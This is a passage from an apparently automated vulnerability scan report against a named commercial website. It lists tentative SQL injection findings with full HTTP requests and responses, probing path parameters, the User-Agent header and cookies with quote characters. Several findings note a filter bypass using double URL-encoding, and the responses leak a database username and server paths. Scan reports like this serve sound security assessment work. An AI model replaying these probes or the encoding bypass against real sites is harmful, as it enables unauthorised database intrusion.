Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.161. http://www.analyticspros.com/component/jsetup/comment/add.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/add.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /component/jsetup'/comment/add.html?commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D&titleheader=%5B HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:29:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:29:39 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:29:39 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<li>Error. Feed not retrieved.</li>
...[SNIP]...

Request 2

GET /component/jsetup''/comment/add.html?commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D&titleheader=%5B HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:29:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:29:41 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:29:42 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27467


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.162. http://www.analyticspros.com/component/jsetup/comment/add.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/add.html

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /component/jsetup/comment/add.html%2527?commenttype=20&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 08:26:51 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/jsetup/comment/add.html%2527%2527?commenttype=20&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 08:26:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:26:56 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:26:56 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26918


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.163. http://www.analyticspros.com/component/jsetup/comment/add.html [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/add.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /component/jsetup/comment/add.html?commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Proxy-Connection: keep-alive
Referer: http://www.analyticspros.com/about.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; fpssCookie=true; apros2.0_tpl=apros2.0; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; __utmb=26076141.26.9.1288999622937; ki_t=1288999540201%3B1288999540201%3B1288999677879%3B1%3B10; __utmmobile=0xade0ac5896f84b3c

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:23:54 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/jsetup/comment/add.html?commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Proxy-Connection: keep-alive
Referer: http://www.analyticspros.com/about.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7%2527%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; fpssCookie=true; apros2.0_tpl=apros2.0; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; __utmb=26076141.26.9.1288999622937; ki_t=1288999540201%3B1288999540201%3B1288999677879%3B1%3B10; __utmmobile=0xade0ac5896f84b3c

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:23:55 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:23:58 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:23:58 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 27117


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.164. http://www.analyticspros.com/component/jsetup/comment/add.html [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/add.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /component/jsetup/comment/add.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141'; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:49:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/jsetup/comment/add.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141''; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:49:22 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.165. http://www.analyticspros.com/component/jsetup/comment/add.html [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/add.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /component/jsetup/comment/add.html?commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D&titleheader=%5B HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141%2527; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:22:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/jsetup/comment/add.html?commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D&titleheader=%5B HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141%2527%2527; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:22:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:22:38 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:22:38 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27449


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.166. http://www.analyticspros.com/component/jsetup/comment/add.html [apros2.0_tpl cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/add.html

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the apros2.0_tpl cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /component/jsetup/comment/add.html?commenttype=20&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:13:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/jsetup/comment/add.html?commenttype=20&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:13:54 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:13:56 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:13:56 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27122


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

